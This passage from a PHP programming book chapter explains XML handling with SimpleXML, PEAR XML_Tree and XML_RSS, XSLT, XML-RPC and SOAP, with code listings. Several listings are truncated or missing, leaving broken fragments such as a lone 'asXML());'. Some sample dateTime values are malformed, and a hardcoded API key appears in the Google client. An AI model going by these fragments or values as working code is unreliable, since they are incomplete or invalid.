The last rule, “String conversion allows access to TEXT data,” means we can access all text data from the elements. With the following code, we echo the contents of the second <p> tag (thus combining rules 2 and 4):

    <?php
    echo $sx2->body->p[1];
    ?>

However, the output doesn’t show Moved to example.org. Rather, it shows Moved to . As you can see, accessing TEXT data from a node does not include the text of its child nodes. You can use the asXML() method to include child nodes, but this will also include all the tags. Using strip_tags() prevents this. The following example outputs Moved to example.org:

    <?php
    echo strip_tags($sx2->body->p[1]->asXML()) . "\n";
    ?>

If you want to iterate over all child elements of the body node, use the children() method of the SimpleXML element object. The following example iterates over all children of <body>:

    <?php
    foreach ($sx2->body->children() as $element) {
        /* do something with the element */
    }
    ?>

If you want to iterate over all the attributes of an element, the attributes() method is available to you. Let’s iterate over all the attributes of the first <a> tag:

    <?php
    foreach ($sx2->body->p[0]->a->attributes() as $attribute) {
        echo $attribute . "\n";
    }
    ?>

8.4.3 Storing SimpleXML Objects

You can store a changed or manipulated structure or a subnode to disk. You use the asXML() method to do this, which you can call on any SimpleXML object:

    asXML());
    ?>

8.5 PEAR

In some cases, none of the previous techniques may be appropriate. For example, the DOM XML extension might not be available, or you might want to parse something very specific and don’t want to build a parser yourself. PEAR contains classes that deal with parsing XML, which might be useful. We’ll cover two of them: XML_Tree and XML_RSS. XML_Tree is useful for building XML documents through a tree when the DOM XML extension is not available or when you want to build a document fast without too many features. XML_RSS

can parse RSS files. RSS files are XML documents describing the last few items of (for example) a news site.

8.5.1 XML_Tree

Building an XML document with XML_Tree is quite easy, and can be done when the DOM XML extension is not available. You can install this PEAR class by typing pear install XML_Tree at your command prompt. To show you the difference between XML_Tree and the “normal” DOM XML method, we’re going to build the same X(HT)ML document again.

    <?php
    require_once 'XML/Tree.php';

    $dom = new XML_Tree;
    $html =& $dom->addRoot('html', '',
        array (
            'xmlns' => 'http://www.w3.org/1999/xhtml',
            'xml:lang' => 'en',
            'lang' => 'en'
        )
    );

    /* Create head and title elements */
    $head =& $html->addChild('head');
    $title =& $head->addChild('title', 'XML Example');

    /* Create the body and p elements */
    $body =& $html->addChild('body', '', array ('background' => 'bg.png'));
    $p =& $body->addChild('p');

    /* Add the "Moved to" */
    $p->addChild(NULL, "Moved to ");

    /* Add the a */
    $p->addChild('a', 'example.org', array ('href' => 'http://example.org'));

    /* Add the ".", br and "foo & bar" */
    $p->addChild(NULL, ".");
    $p->addChild('br');
    $p->addChild(NULL, "foo & bar");

    /* Dump the representation */
    $dom->dump();
    ?>

As you can see, it’s much easier to add an element with attributes and (simple) content with XML_Tree. For example, look at the following line that adds the a element to the p element:

    $p->addChild('a', 'example.org', array ('href' => 'http://example.org'));

Instead of four method calls, you can add it with a one-liner. Of course, the DOM XML extension has many more features than XML_Tree, but for simple tasks, we recommend this excellent PEAR class.

8.5.2 XML_RSS

RSS (RDF Site Summary, Really Simple Syndication) feeds are a common use of XML. RSS is an XML vocabulary to describe news items, which can then be integrated (also called content syndication) into your own web site. PHP.net has an RSS feed with the latest news items at http://www.php.net/news.rss. You can find the dry specs of the RSS specification at http://web.resource.org/rss/1.0/spec, but it’s much better to see an example. Here is part of the RSS file we’re going to parse:

    <channel>
      <title>PHP: Hypertext Preprocessor</title>
      <link>http://www.php.net/</link>
      <description>The PHP scripting language web site</description>
    </channel>

    <item>
      <title>PHP 4.3.5RC1 released!</title>
      <link>http://qa.php.net/</link>
      <description>PHP 4.3.5RC1 has been released for testing. This is
        the first release candidate and should have a very low number
        of problems and/or bugs. Nevertheless, please download and test
        it as much as possible on real-life applications to uncover any
        remaining issues. List of changes can be found in the NEWS
        file.</description>
      <dc:date>2004-01-12</dc:date>
    </item>

    <item>
      <title>PHP 5.0 Beta 3 released!</title>
      <link>http://www.php.net/downloads.php</link>
      <description>PHP 5.0 Beta 3 has been released. The third beta of
        PHP is also scheduled to be the last one (barring unexpected
        surprises). This beta incorporates dozens of bug fixes since
        Beta 2, better XML support and many other improvements, some of
        which are documented in the ChangeLog. Some of the key
        features of PHP 5 include: PHP 5 features the Zend Engine 2.
        XML support has been completely redone in PHP 5, all
        extensions are now focused around the excellent libxml2
        library (http://www.xmlsoft.org/). SQLite has been bundled
        with PHP. For more information on SQLite, please visit their
        website. A new SimpleXML extension for easily accessing and
        manipulating XML as PHP objects. It can also interface with
        the DOM extension and vice-versa. Streams have been greatly
        improved, including the ability to access low-level socket
        operations on streams.</description>
      <dc:date>2003-12-21</dc:date>
    </item>

This RSS file consists of two parts: the header, describing the site from which the content is syndicated, and a list of available items. The second part consists of the news items. We don’t want to refetch the RSS file from http://php.net every time a user visits a page that displays this information. Thus, we’re going to add some caching. Downloading the file once a day should be sufficient because news isn’t updated more often than daily. (That holds for php.net; other sites might have different policies.)

We’re going to use the PEAR::XML_RSS class that we installed with pear install XML_RSS. Here is the script:
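The once-a-day caching rule described above can be sketched as follows. This is a minimal sketch rather than the authors' listing: the helper names cache_is_stale() and refresh_cache(), the cache location in the usage comment, and the use of copy() to fetch the feed are all assumptions made for illustration.

```php
<?php
// Hypothetical helper: returns true when the cache file is missing or older
// than $max_age seconds. $now is a parameter so that the rule can be checked
// without waiting a day.
function cache_is_stale($cache_file, $max_age, $now)
{
    if (!file_exists($cache_file)) {
        return true;
    }
    return ($now - filemtime($cache_file)) > $max_age;
}

// Hypothetical helper: fetches the feed into the cache file only when the
// cached copy is stale. copy() with a URL requires allow_url_fopen.
function refresh_cache($url, $cache_file, $max_age)
{
    if (cache_is_stale($cache_file, $max_age, time())) {
        return copy($url, $cache_file);
    }
    return true;
}

// Usage (the cache path is an assumed example; 86,400 seconds is one day):
// refresh_cache('http://www.php.net/news.rss', '/tmp/php.net.rss', 86400);
```

Keeping the age check separate from the download makes the rule easy to verify and keeps the network access in one place.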

Next, we check whether the file has been cached before and whether the cache file is too old (86,400 seconds is one day). If it doesn’t exist or is too old, we download a new copy from php.net and store it in the cache file.

    $r = new XML_RSS($cache_file);
    $r->parse();

We instantiate the XML_RSS class, passing our RSS file, and call the parse() method. This method parses the RSS file into a structure that can be fetched by other methods, such as getChannelInfo(), which returns an array containing the title, description, and link of the web site, as shown here:

    array(3) {
      ["title"]=>
      string(27) "PHP: Hypertext Preprocessor"
      ["link"]=>
      string(19) "http://www.php.net/"
      ["description"]=>
      string(35) "The PHP scripting language web site"
    }

getItems() returns the title, description, and link of each news item. In the following code, we use the getItems() method to loop over all items and display them:

    foreach ($r->getItems() as $value) {
        echo strtoupper($value['title']). "\n";
        echo wordwrap($value['description']). "\n";
        echo "\t{$value['link']}\n\n";
    }
    ?>

When you run the script, you will see that it outputs the news items from the RSS file:

    PHP 4.3.5RC1 RELEASED!
    PHP 4.3.5RC1 has been released for testing. This is the first release
    candidate and should have a very low number of problems and/or bugs.
    Nevertheless, please download and test it as much as possible on real-life
    applications to uncover any remaining issues. List of changes can be found
    in the NEWS file.
            http://qa.php.net/

    PHP 5.0 BETA 3 RELEASED!
    PHP 5.0 Beta 3 has been released. The third beta of PHP is also scheduled
    to be the last one (barring unexpected surprises). This beta incorporates
    dozens of bug fixes since Beta 2, better XML support and many other
    improvements, some of which are documented in the ChangeLog. Some of the
    key features of PHP 5 include: PHP 5 features the Zend Engine 2. XML
    support has been completely redone in PHP 5, all extensions are now focused
    around the excellent libxml2 library (http://www.xmlsoft.org/). SQLite has
    been bundled with PHP. For more information on SQLite, please visit their
    website. A new SimpleXML extension for easily accessing and manipulating
    XML as PHP objects. It can also interface with the DOM extension and
    vice-versa. Streams have been greatly improved, including the ability to
    access low-level socket operations on streams.
            http://www.php.net/downloads.php

8.6 CONVERTING XML

You might want to convert an XML document into something else, such as an HTML document, a text file, or an XML file in a different format. The standard method for converting an XML document to another format is by using XSLT (eXtensible Stylesheet Language Transformations). XSLT is complex, so we are not going over all the details of the XML vocabulary. If you want to learn more about XSLT, you can find the full specification at http://www.w3.org/TR/xslt.

If XSLT doesn’t do what you want, you might need to resort to other solutions. The XML_Transformer PEAR class is one possible solution. With XML_Transformer, you can do XML transformations with PHP without the need for XSLT or external libraries.

8.6.1 XSLT

To use the XSLT functions in PHP, you need to install the latest version of the libxslt library, which implements the necessary functions for transformations.
If you use Windows, you can copy the libxslt.dll file from the dlls directory of the PHP distribution to a location on your path (for example, c:\winnt\system32). Enabling the extension on UNIX is done by adding --with-xsl to your configure line and recompiling. Windows users can uncomment the extension=php_xsl.dll line in the php.ini file.

As explained earlier, you can use XSLT to transform your XML documents into another format. We’re going to transform a file similar to our RSS file into an X(HT)ML file by applying stylesheets to the XML document. Stylesheets are used for all transformations done with XSLT to map the elements in the source XML file with a template for each element. The first part of the XSL stylesheet contains options for input and output. We want to output the result as an HTML document with mime-type 'text/html' in the ISO-8859-1 encoding. The namespace for the XSL declaration is defined as xsl,

meaning that every element related to XSL has the prefix xsl: in front of the tag name (for example, xsl:output).

The templates follow the header section shown earlier. The match attribute of the xsl:template element is used to select elements in the document. In the first template, all "rdf" elements in the document will be matched. Because this is the root element of our document, the template is only applied once. When an element is matched by a template, the contents of the xsl:template are copied to the output document, with the exception of elements belonging to the XSL namespace, which have a special meaning:

    <xsl:value-of select="channel/title"/>

The <xsl:value-of> tag “returns” the value of the element or attribute specified in its select attribute. In the template shown here, the contents of the title child of the channel element are inserted into the <title> tag in the output document. References are usually relative to the element that has been matched.

If you want to include the contents of an attribute, rather than an element, you need to add @ as a prefix; for example, to select the "href" attribute in <a href="http://www.example.org"></a>, you can use <xsl:value-of select="@href"/> (provided that the element matched by the template is the "a" element).

Another special tag in the previous snippet, the <xsl:apply-templates/> tag, tells the XSL processor to continue processing child elements.
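The three constructs just described (value-of on an element, value-of on an attribute with the @ prefix, and apply-templates) can be seen working together in a small transformation. This is a sketch under our own assumptions: the inline stylesheet and source document are made up for illustration and are not parts of php.net.xsl, and the xsl extension must be enabled for the transformation to run.

```php
<?php
// Illustrative stylesheet; text output keeps the result easy to read.
$stylesheet = <<<XSL
<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:output method="text"/>
  <!-- Matched once for the root element; continues with its child elements. -->
  <xsl:template match="links">
    <xsl:apply-templates/>
  </xsl:template>
  <!-- "." selects the text of the matched element, "@href" its attribute. -->
  <xsl:template match="a">
    <xsl:value-of select="."/>=<xsl:value-of select="@href"/>;</xsl:template>
</xsl:stylesheet>
XSL;

// Illustrative source document.
$source = '<links><a href="http://example.org/">example</a>'
        . '<a href="http://www.php.net/">php</a></links>';

$result = null;
if (class_exists('XSLTProcessor')) {
    $xsl = new DOMDocument();
    $xsl->loadXML($stylesheet);

    $xml = new DOMDocument();
    $xml->loadXML($source);

    $proc = new XSLTProcessor();
    $proc->importStylesheet($xsl);
    $result = $proc->transformToXml($xml);
    echo $result, "\n";
} else {
    echo "The xsl extension is not enabled.\n";
}
```

Each a element yields one "text=URL;" pair, which shows that the references in the second template are resolved relative to the element it matched.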
    <xsl:template match="channel">
      <h1><xsl:value-of select="title"/></h1>
      <p><xsl:value-of select="description"/></p>
      <xsl:apply-templates select="items"/>
    </xsl:template>

If you don’t want to process all child elements of the currently matched element, you can select the elements to process with the select attribute of the <xsl:apply-templates/> tag, similar to the match attribute of the <xsl:template/> tag. In the previous template, we continue processing child elements of the type "items" only, skipping "title", "link", and "description".

    <xsl:template match="Seq">
      <ul>
        <xsl:apply-templates/>
      </ul>
    </xsl:template>

    <xsl:key name="l" match="item" use="@about"/>

    <xsl:template match="li">
      <li>
        <a href="#{generate-id(key('l',@resource))}">
          <xsl:value-of select="key('l',@resource)/title"/>
        </a>
      </li>
    </xsl:template>

    <xsl:template match="item">
      <hr/>
      <a name="{generate-id()}">
        <h2><xsl:value-of select="title"/></h2>
        <p>
          <xsl:value-of select="description"/>
        </p>
        <p>
          <xsl:element name="a">
            <xsl:attribute name="href"><xsl:value-of select="link"/></xsl:attribute>
            <xsl:text>[more]</xsl:text>
          </xsl:element>
        </p>
      </a>
    </xsl:template>

    </xsl:stylesheet>

The rest of the stylesheet makes a crosslink between the "li" children of the "items" tag and the <item/>s. The XSLT magic used is beyond the scope of this chapter. Other interesting XSL elements in the template for "item" are <xsl:element/> and <xsl:attribute/>, which enable you to use the content of a value as an attribute for an output element. <a href="<xsl:value-of select="link"/>"> would not be valid, because XSL files are themselves just XML documents.
Instead, you need to create an element in the output document with <xsl:element name="a"/> and add the attributes with <xsl:attribute name="href"/>, as shown in the previous template.

The modified RSS file is included here with all the namespace modifiers removed, because they would have made the example unnecessarily complex:

    <?xml version="1.0" encoding="UTF-8"?>
    <rdf>
      <channel about="http://www.php.net/">
        <title>PHP: Hypertext Preprocessor</title>
        <link>http://www.php.net/</link>
        <description>The PHP scripting language web site</description>
        <items>
          <Seq>
            <li resource="http://qa.php.net/"/>
            <li resource="http://www.php.net/news.rss"/>
          </Seq>
        </items>
      </channel>
      <item about="http://qa.php.net/">
        <title>PHP 4.3.0RC4 Released</title>
        <link>http://qa.php.net/</link>
        <description>Despite our best efforts, it was necessary to make one more
          release candidate, hence PHP 4.3.0RC4.</description>
      </item>
      <item about="http://www.php.net/news.rss">
        <title>PHP news feed available</title>
        <link>http://www.php.net/news.rss</link>
        <description>The news of PHP.net is available now in RSS 1.0 format via
          our new news.rss file.</description>
      </item>
    </rdf>

Now that we have both the stylesheet and the XML source file, we can use PHP to apply the stylesheet to the XML document. We use the XSLT functions with the files php.net.xsl and php.net-stripped.rss, and echo the output to screen:

    <?php
    $dom = new DomDocument();
    $dom->load("php.net.xsl");
    $proc = new XsltProcessor;
    $xsl = $proc->importStylesheet($dom);

    $xml = new DomDocument();
    $xml->load('php.net-stripped.rss');

    $string = $proc->transformToXml($xml);
    echo $string;
    ?>

Tip: You can use the same XSLT stylesheet, loaded once with $dom->load(), for the transformation of multiple XML documents (with repeated calls such as $proc->transformToXml($xml)). This saves the overhead of parsing the XSLT stylesheet again.

When you call this script through your browser, the result is something like what is displayed in Figure 8.2.

Fig. 8.2 Output of the XSLT transformation.

In addition to the transformToXml() method, two more XSLT processing functions are available to convert documents: transformToDoc() and transformToUri(). transformToDoc() outputs a DomDocument that can then be processed further with the standard DOM functions described earlier. transformToUri() renders to a URI, given as the second parameter to the function, as shown here:

    <?php
    $proc->transformToUri($xml, "/tmp/crap.html");
    ?>

8.7 COMMUNICATING WITH XML

Applications currently communicate via the Internet in several ways, most of which you already know. TCP/IP and UDP/IP are used, but are only low-level transport protocols. Communication between systems is difficult because systems store data in memory using different methods. For example, Intel has a different order of data in memory (Little Endian) than PowerPCs (Big Endian). Another major point was that people just wanted a solid cross-platform communication technology. One solution is RPC (Remote Procedure Calls), but it’s not easy to use, and it’s implemented differently by Windows than by most UNIX platforms.

XML is often the best solution. XML was developed to “promote” interoperability between systems. It allows applications on different systems to communicate using a standard format. XML is plain-text data, so the differences between systems (such as endianness) are minimized. Other differences, such as date representation, still exist. One platform might specify Wed Dec 25 16:58:40 CET 2002, another just Wed 2002-12-25. XML-RPC and SOAP are both XML-based protocols. SOAP is the broader protocol, designed specifically for communication, and is well-supported.

8.7.1 XML-RPC

Let’s start with the simplest way of communication: XML-RPC.

8.7.1.1 Messages

XML-RPC is a request-response protocol. For every request to a server, a response is returned. The response can be a valid result or an error. Both the request and response packets are encoded as XML. The values in the packets are encoded with different elements. The XML-RPC specification defines a number of scalar types to which the data that is going to be transported must be converted (see Table 8.1).
Table 8.1 XML-RPC Data Types

    XML-RPC Type          Description                     Example Value
    <i4/> or <int/>       Four-byte signed integer        -8123
    <boolean/>            0 (false) or 1 (true)           1
    <string/>             ASCII string                    Hello world
    <double/>             Double-precision signed         91.213
                          floating-point number
    <dateTime.iso8601/>   Date/time                       200404021T14:08:55
    <base64/>             Base 64-encoded binary          eW91IGNhbid0IHJlYWQgdGhpcyE
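To make the table concrete, the sketch below wraps PHP scalars in the matching XML-RPC type elements by using the DOM extension. The function name rpc_scalar_value() and the mapping from PHP types to XML-RPC types are our assumptions for illustration; this is not how the PEAR XML_RPC package is implemented.

```php
<?php
// Hypothetical helper: returns a <value> element that holds $v in the
// XML-RPC scalar type matching its PHP type (see Table 8.1).
function rpc_scalar_value($doc, $v)
{
    if (is_bool($v)) {
        $type = 'boolean';
        $text = $v ? '1' : '0';
    } elseif (is_int($v)) {
        $type = 'int';
        $text = (string) $v;
    } elseif (is_float($v)) {
        $type = 'double';
        $text = (string) $v;
    } else {
        $type = 'string';
        $text = (string) $v;
    }

    $value = $doc->createElement('value');
    $typed = $doc->createElement($type);
    // Text nodes are escaped on output, so & and < are safe in strings.
    $typed->appendChild($doc->createTextNode($text));
    $value->appendChild($typed);

    return $value;
}

$doc = new DOMDocument();
foreach (array(-8123, true, 'Hello world', 91.213) as $v) {
    echo $doc->saveXML(rpc_scalar_value($doc, $v)), "\n";
}
```

The boolean check comes first on purpose, so that true and false are never mistaken for another scalar type.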

When a value is transported, it is wrapped inside a <value> tag, like this:

    <value><dateTime.iso8601>20021221R14:12:81</dateTime.iso8601></value>

Two compound data types are available: <array> for non-associative arrays, and <struct> for associative arrays. Here is an example of an <array>:

    <array>
      <data>
        <value>1</value>
        <value>Hello!</value>
        <value>1</value>
      </data>
    </array>

As you can see, the values 1 and Hello! are wrapped into the <data> element, which is a child of the <array> element. In addition, <struct> elements have a key associated with a value, so the XML looks slightly more complicated:

    <struct>
      <member>
        <name>key-een</name>
        <value>1</value>
      </member>
      <member>
        <name>key-zwei</name>
        <value>2</value>
      </member>
    </struct>

The values (both scalar and compound) are wrapped inside special tags in requests and responses, which you can see in the following sections.

8.7.1.2 Request

Requests in XML-RPC are normal POST requests to an HTTP server with some special additions:

    POST /chapter_14/xmlrpc_example.php HTTP/1.0
    User-Agent: PHP XMLRPC 1.0
    Host: localhost
    Content-Type: text/xml
    Content-Length: 164

The Content-Type is always text/xml.

Next, an XML declaration appears. The body consists solely of an XML document, as follows:

    <?xml version="1.0"?>
    <methodCall>
      <methodName>hello</methodName>
      <params>
        <param>
          <value><string>Derick</string></value>
        </param>
      </params>
    </methodCall>

Every RPC request call consists of the <methodCall> tag, followed by the <methodName> tag that specifies the name of the remote function to call. Parameters can be passed. Each parameter is passed inside a <param> element. The param elements are grouped and enclosed in the <params> element, a child of the <methodCall> element. The XML-RPC packet in the previous example code calls the remote "hello" function, passing the parameter Derick.

8.7.1.3 Response

When the function call succeeds, an XML-RPC response is returned to the caller program, encoded in XML. There are basically two different responses possible to a request: a normal response (methodResponse), shown in the following example, or a fault.

You can recognize a normal response by the <params> child element of the <methodResponse> tag. A successful methodResponse always has one <params> child, which always has one <param> child. You can’t return more than one value from within a function, but you can return a <struct> or an <array> to mimic returning multiple values. The methodResponse shows the result of the request shown in the previous section:

    <?xml version="1.0"?>
    <methodResponse>
      <params>
        <param>
          <value><string>Hi Derick!</string></value>
        </param>
      </params>
    </methodResponse>

8.7.1.4 Fault

Not all requests return a normal response, and not everything works as expected (for example, in case of PEBCAK). When something doesn’t work as expected, a <fault> element is returned, rather than a <params> element. The <fault> always contains a <struct> with two members: the faultCode (with an integer value) and a faultString (a string). Because the faultCodes are not defined in the XML-RPC specification, they are implementation-dependent.
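Telling the two kinds of response apart takes only a few lines with SimpleXML. The following is a sketch, with sample packets written by us according to the rules above (a <params> child for a normal response, a <fault> child holding a struct with faultCode and faultString otherwise); the function name read_response() is hypothetical.

```php
<?php
// Hypothetical helper: returns array('ok', value) for a normal response
// or array('fault', code, message) for a fault.
function read_response($packet)
{
    $sx = simplexml_load_string($packet);

    if (isset($sx->fault)) {
        $fault = array();
        foreach ($sx->fault->value->struct->member as $member) {
            // Each <value> holds a single typed child element.
            $typed = $member->value->children();
            $fault[(string) $member->name] = (string) $typed[0];
        }
        return array('fault', (int) $fault['faultCode'], $fault['faultString']);
    }

    $typed = $sx->params->param->value->children();
    return array('ok', (string) $typed[0]);
}

// Sample packets assembled for this sketch.
$ok = '<?xml version="1.0"?><methodResponse><params><param>'
    . '<value><string>Hi Derick!</string></value>'
    . '</param></params></methodResponse>';

$fault = '<?xml version="1.0"?><methodResponse><fault><value><struct>'
       . '<member><name>faultCode</name><value><int>3</int></value></member>'
       . '<member><name>faultString</name><value><string>'
       . 'Incorrect parameters passed to method</string></value></member>'
       . '</struct></value></fault></methodResponse>';

print_r(read_response($ok));
print_r(read_response($fault));
```

The sketch relies on the SimpleXML rules from section 8.4: properties walk down the element tree, and string conversion yields the text of the typed element.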

    Here is an example of a <fault> response:

        <?xml version="1.0"?>
        <methodResponse>
          <fault>
            <value>
              <struct>
                <member>
                  <name>faultCode</name>
                  <value><int>3</int></value>
                </member>
                <member>
                  <name>faultString</name>
                  <value><string>Incorrect parameters passed to method</string></value>
                </member>
              </struct>
            </value>
          </fault>
        </methodResponse>

    8.7.1.5 The Client

    Now, it's time for a practical application. We'll start by writing a simple client to call XML-RPC functions on our local machine (a sample for the server follows in the next section). We will be using the PEAR "XML_RPC" class, which can be installed with pear install XML_RPC:

        <?php
        require_once 'XML/RPC.php';

        /* Create the client object; the path and host match the
         * request shown in the "Request" section */
        $client = new XML_RPC_Client('/chapter_14/xmlrpc_example.php', 'localhost');

        function call_method($client, $msg)
        {
            /* Send the request */
            $p = $client->send($msg);

            /* Check for an error, and print out the error message if
             * necessary */
            if (PEAR::isError($p)) {
                echo $p->getMessage();
            } else {
                /* Check if an XML RPC fault was returned, and display
                 * the faultString */
                if ($p->faultCode()) {
                    print $p->faultString();
                    return NULL;
                } else {
                    /* Return the value upon a valid response */
                    $res = $p->value();
                    return $res;
                }
            }
        }

    Next, we call the RPC functions through the call_method() function we just wrote. We can specify types for the parameters that we pass to the remote function either explicitly or implicitly. In this first example, we construct an XML_RPC_Message with one explicit parameter that has the value 'Derick' and the type 'string'. The function we call is 'hello', and won't do much more than return hi in response.

        /* Construct the parameter array */
        $vals = array (
            new XML_RPC_Value('Derick', 'string')
        );

        /* Construct the message with the function name and
         * the parameter array */
        $msg = new XML_RPC_Message('hello', $vals);

        /* Send the message and store the result in $res */
        $res = call_method($client, $msg);

        /* If the result is non-null, decode the XML_RPC_Value into a PHP
         * variable and echo it (we assume here that it returns a
         * string) */
        if ($res !== NULL) {
            echo XML_RPC_decode($res)."\n";
        }

    Rather than instantiating an XML_RPC_Value object with an explicit value type, you can call XML_RPC_encode(), which examines the type of the PHP variable and encodes it as the best-fitting XML-RPC type. Table 8.2 shows the type conversions.

    Table 8.2 PHP Type to XML-RPC Type Mappings

        PHP Type                   XML-RPC Type
        NULL                       (empty)
        Boolean                    <boolean>
        String                     <string>
        Integer                    <int>
        Float                      <double>
        Array (non-associative)    <struct>
        Array (associative)        <struct>

    Notice that XML-RPC doesn't have a NULL type and that all types of arrays are converted to a <struct> (because it is inefficient to determine if a PHP array has only numeric indices).

    The following example passes two <double>s to the 'add' function, which adds the two numbers and returns the result:

        /* A somewhat more complex example with implicit types and
         * multiple parameters */
        $vals = array (
            XML_RPC_encode(80.9),
            XML_RPC_encode(-9.71)
        );
        $msg = new XML_RPC_Message('add', $vals);
        $res = call_method($client, $msg);
        echo XML_RPC_decode($res)."\n";

    The XML_RPC_decode() function does exactly the opposite of the XML_RPC_encode() function. Types convert from XML-RPC types to PHP types as shown in Table 8.3.

    Table 8.3 XML-RPC Type to PHP Type Mappings

        XML-RPC Type          PHP Type
        <i4> or <int>         Integer
        <boolean>             Boolean
        <string>              String
        <double>              Float
        <dateTime.iso8601>    String (20040416T18:16:18)
        <base64>              String
        <array>               Array
        <struct>              Array

    8.7.1.6 Retrospection

    If you encounter an XML-RPC server somewhere on the Internet, you might want to know which functions it exports. XML-RPC provides support functions that help you to retrieve all the information necessary to call the functions on the server. This is called retrospection (more commonly known as introspection). With the 'system.listMethods' function, you can retrieve an array containing all exported functions:

        /* Complex example which shows retrospection */
        $msg = new XML_RPC_Message('system.listMethods');
        $res = call_method($client, $msg);
        foreach (XML_RPC_decode($res) as $item) {

    By looping through the returned array, you can request additional information on each function: the description of the function (with the system.methodHelp function) and the signature of the function (with system.methodSignature). system.methodHelp returns a string containing the description. system.methodSignature returns an array of arrays containing the types of the parameters. The first element in each inner array is the return type; the remaining elements contain the types of the parameters to pass to the function. The following code first requests the description, and then the types of the return value and parameters for the function:

            $vals = array (XML_RPC_encode($item));
            $msg = new XML_RPC_Message('system.methodHelp', $vals);
            $desc = XML_RPC_decode(call_method($client, $msg));

            $msg = new XML_RPC_Message('system.methodSignature', $vals);
            $sigs = XML_RPC_decode(call_method($client, $msg));

            $siginfo = '';
            foreach ($sigs[0] as $sig) {
                $siginfo .= $sig. " ";
            }
            echo "$item\n". wordwrap($desc). "\n\t$siginfo\n\n";
        }
        ?>

    This was the client side. Now, let's implement the server side of our two functions.

    8.7.1.7 The Server

    Writing the server is not much harder than writing the client. Instead of including the XML/RPC.php file, we now include the file that implements the server functionality:

        <?php
        require_once 'XML/RPC/Server.php';

        function hello ($args)
        {
            /* Fetch the parameters passed to the function */
            $vals = $args->getValues();

            /* We simply return an XML_RPC_Value containing the
             * result with the 'string' type */
            return new XML_RPC_Response(
                new XML_RPC_Value("Hi {$vals[0]}!", 'string')
            );
        }

        function add ($args)
        {
            $vals = $args->getValues();

            return new XML_RPC_Response(
                new XML_RPC_Value($vals[0] + $vals[1], 'double')
            );
        }

    To make the functions available to the outside, we need to define the methods by putting the function name, signature, and description string into an array containing an element for each function. The signature is formatted the way system.methodSignature should return it: an array containing an array with the types (return type first, then the parameter types):

        $methods = array(
            'hello' => array (
                'function'  => 'hello',
                'signature' => array(
                    array(
                        $GLOBALS['XML_RPC_String'],
                        $GLOBALS['XML_RPC_String']
                    )
                ),
                'docstring' => 'Greets you.'
            ),
            'add' => array (
                'function'  => 'add',
                'signature' => array(
                    array(
                        $GLOBALS['XML_RPC_Double'],
                        $GLOBALS['XML_RPC_Double'],
                        $GLOBALS['XML_RPC_Double']
                    )
                ),
                'docstring' => 'Adds two numbers'
            )
        );

    We make the defined methods available by instantiating the XML_RPC_Server class. The constructor of this class handles parsing the request and calling the functions. You need to do nothing on your own, unless you want more advanced features that fall outside of the scope of this chapter.

        $server = new XML_RPC_Server($methods);
        ?>

    With this, we conclude XML-RPC.

    8.7.2 SOAP

    This section guides you through using SOAP as a client for the Google Web API and implementing your own SOAP server. Because SOAP is even more complex than XML-RPC, we unfortunately can't include everything.

    8.7.2.1 PEAR::SOAP

    Google is a nice, fast search engine. Wouldn't it be great to have your own command-line search engine written in PHP? This section tells you how.

    Google

    To make use of the SOAP API that Google exports, you need an account, which you can create on http://www.google.com/apis/. When you register, you receive a key via email that you use when you call the SOAP method. For the following example to work correctly, you need to install the PEAR SOAP class, with pear install SOAP. After SOAP is installed, we can start with the following simple script. First, include the PEAR::SOAP class and create the client:

        #!/usr/local/bin/php
        <?php
        /* Include the PEAR::SOAP client class */
        require_once 'SOAP/Client.php';

        /* Create a client for Google's SOAP search endpoint */
        $client = new SOAP_Client('http://api.google.com/search/beta2');

    The search string is passed on the command line. If no parameter was passed, we'll display a little usage message:

        /* Read the search string from the command line */
        if ($argc != 2) {
            echo "usage: ./google.php searchstring\n\n";
            exit();
        }
        $query = $argv[1];

    Then, we set up the other parameters for the SOAP call. Note that we don't do anything to specify the type of the variables; we just let the class decide this for us:

        /* Defining the 'license' key */
        $key = 'jx+PnvxQFHIrV1A2rnckQn8t91Pp/6Zg';

        /* Defining maximum number of results and starting index */
        $maxResults = 3;
        $start = 0;

        /* Setup the other parameters */
        $filter = FALSE;
        $restrict = '';
        $safeSearch = FALSE;
        $lr = '';
        $ie = '';
        $oe = '';

    Next, we make the call to Google. The call() method of the SOAP_Client object expects three parameters:

    ☞ The name of the function to call
    ☞ An array with parameters for the call
    ☞ The namespace for the call

        /* Make the call */
        $params = array(
            'key'        => $key,
            'q'          => $query,
            'start'      => $start,
            'maxResults' => $maxResults,
            'filter'     => $filter,
            'restrict'   => $restrict,
            'safeSearch' => $safeSearch,
            'lr'         => $lr,
            'ie'         => $ie,
            'oe'         => $oe
        );
        $response = $client->call(
            'doGoogleSearch',
            $params,
            array('namespace' => 'urn:GoogleSearch')
        );

    In this example, we assume that the search call returned something useful, although it might not always do so. The Google API returns the text with XML entities escaped and with some inserted HTML tags (such as <b>). We convert the entities to normal characters using html_entity_decode() and strip all tags with strip_tags():

        /* Display results */
        foreach ($response->resultElements as $result) {
            echo html_entity_decode(
                strip_tags("{$result->title}\n({$result->URL})\n\n")
            );
            echo wordwrap(html_entity_decode(strip_tags($result->snippet)));
            echo "\n\n----------------------------\n\n";
        }
        ?>

    Now, let's go to the next example where we implement a simple SOAP client and server using the same functions as in the XML-RPC examples.

    SOAP Server

    Here is the server. First, we include the PEAR SOAP_Server class. Next, we define a class (Example) with the two functions that we want to export through SOAP. In the hello() method, we use implicit conversion from PHP types to SOAP types; in the add() method, we explicitly define the SOAP type (float):

    To fire up the server and process the request data that is stored in HTTP_RAW_POST_DATA, we instantiate the SOAP_Server class, instantiate the class with our methods, associate that class with the SOAP_Server, and process the request by calling the service() method of the SOAP_Server object. The service() method processes the data that was posted to the PHP script, extracts the function name and parameters out of the XML, and calls the function in our Example class:

        $server = new SOAP_Server;
        $soapclass = new Example();
        $server->addObjectMap($soapclass, 'urn:Example');
        $server->service($HTTP_RAW_POST_DATA);
        ?>

    SOAP Client

    The client is much like the Google client, except that we use explicit typing for the parameters in the call to the add() method:

        #!/usr/local/bin/php
        <?php
        require_once 'SOAP/Client.php';

        /* Create the client; the host and path match the request
         * dump that follows this listing */
        $client = new SOAP_Client('http://kossu/chap_xml/soap/server.php');

        /* Make the call */
        $response = $client->call(
            'hello',
            array('arg' => 'Derick'),
            array('namespace' => 'urn:Example')
        );
        var_dump($response);

        /* Make the call */
        $a = new SOAP_Value('a', 'int', 212.3);
        $b = new SOAP_Value('b', 'int', 312.3);
        $response = $client->call(
            'add',
            array($a, $b),
